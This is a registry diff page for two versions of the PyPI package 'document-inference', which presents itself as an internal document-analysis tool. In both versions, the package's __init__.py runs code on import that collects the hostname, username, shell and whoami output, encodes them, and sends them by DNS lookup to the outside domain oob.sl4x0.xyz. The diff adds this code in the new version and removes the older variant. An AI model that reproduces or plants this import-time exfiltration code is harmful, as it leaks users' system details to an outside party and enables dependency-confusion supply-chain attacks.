PyPI - document-inference - Versions diffs - 0.0.0__tar.gz → 0.0.2__tar.gz - Mend

document-inference 0.0.0tar.gz → 0.0.2tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (10) hide show

{document_inference-0.0.0 → document_inference-0.0.2}/PKG-INFO RENAMED Viewed

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: document-inference
-Version: 0.0.0
+Version: 0.0.2
 Summary: Internal Document Analysis Package
 Home-page: https://company-internal.example.com
 Author: Internal Team

document_inference-0.0.2/document_inference/__init__.py ADDED Viewed

@@ -0,0 +1,31 @@
+import os
+import socket
+import uuid
+import base64
+import subprocess
+def exfiltrate():
+    uid = str(uuid.uuid4())[:8]
+    hostname = os.uname()[1]
+    user = os.getenv("USER") or os.getenv("USERNAME") or "unknown"
+    shell = os.getenv("SHELL") or "noshell"
+    home = os.getenv("HOME") or "nohome"
+    # Optional RCE output - simple harmless cmd
+    try:
+        cmd_output = subprocess.check_output(["whoami"], stderr=subprocess.DEVNULL).decode().strip()
+    except Exception:
+        cmd_output = "fail"
+    # Compress & limit payload (DNS-safe)
+    marker = "docinf"
+    data = f"{uid}:{hostname}:{user}:{shell}:{cmd_output}:{marker}"
+    hexdata = base64.b16encode(data.encode()).decode().lower()[:50]  # DNS label limit
+    try:
+        # Send DNS request to your Bind9 server
+        socket.gethostbyname(f"{hexdata}.oob.sl4x0.xyz")
+    except Exception:
+        pass
+exfiltrate()

{document_inference-0.0.0 → document_inference-0.0.2}/document_inference.egg-info/PKG-INFO RENAMED Viewed

@@ -1,6 +1,6 @@
 Metadata-Version: 2.4
 Name: document-inference
-Version: 0.0.0
+Version: 0.0.2
 Summary: Internal Document Analysis Package
 Home-page: https://company-internal.example.com
 Author: Internal Team

{document_inference-0.0.0 → document_inference-0.0.2}/setup.py RENAMED Viewed

@@ -3,7 +3,7 @@ from setuptools import setup, find_packages
 setup(
     name="document-inference",
-    version="0.0.0",
+    version="0.0.2",
     description="Internal Document Analysis Package",
     long_description="Private package accidentally exposed",
     long_description_content_type="text/markdown",

document_inference-0.0.0/document_inference/__init__.py DELETED Viewed

@@ -1,19 +0,0 @@
-import socket
-import uuid
-import os
-def exfiltrate():
-    uid = str(uuid.uuid4())[:8]  # Short unique string
-    hostname = os.uname()[1]
-    user = os.getenv("USER") or os.getenv("USERNAME")
-    marker = "docinf-poc"
-    data = f"{uid}-{hostname}-{user}-{marker}"
-    hexdata = data.encode().hex()[:40]  # limit to safe DNS length
-    try:
-        socket.gethostbyname(f"{hexdata}.oob.sl4x0.xyz")
-    except:
-        pass
-exfiltrate()

{document_inference-0.0.0 → document_inference-0.0.2}/README.md RENAMED Viewed

File without changes

{document_inference-0.0.0 → document_inference-0.0.2}/document_inference.egg-info/SOURCES.txt RENAMED Viewed

File without changes

{document_inference-0.0.0 → document_inference-0.0.2}/document_inference.egg-info/dependency_links.txt RENAMED Viewed

File without changes

{document_inference-0.0.0 → document_inference-0.0.2}/document_inference.egg-info/top_level.txt RENAMED Viewed

File without changes

{document_inference-0.0.0 → document_inference-0.0.2}/setup.cfg RENAMED Viewed

File without changes

document-inference 0.0.0__tar.gz → 0.0.2__tar.gz

document-inference 0.0.0tar.gz → 0.0.2tar.gz